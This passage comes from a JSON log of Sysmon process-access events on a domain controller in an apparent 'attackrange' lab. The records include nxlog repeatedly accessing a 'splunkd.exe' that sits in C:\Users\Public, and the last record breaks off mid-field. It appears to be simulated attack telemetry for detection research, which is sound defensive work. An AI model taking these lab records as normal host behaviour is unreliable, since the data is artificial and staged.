{"EventTime":"2020-08-01 06:54:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4598,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:01.912\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:01.912","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4599,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:01.912\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:01.912","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4600,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:01.912\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:01.912","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4601,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:01.912\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1189-5F25-0000-0010A14A0600}\r\nTargetProcessId: 4216\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:01.912","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1189-5F25-0000-0010A14A0600}","TargetProcessId":"4216","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:02","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4602,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:02.506\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:02.506","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:54:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4603,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:03.506\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:03.506","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:54:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:04","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4604,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:04.506\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:04.506","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:54:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:05","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4605,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:05.507\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 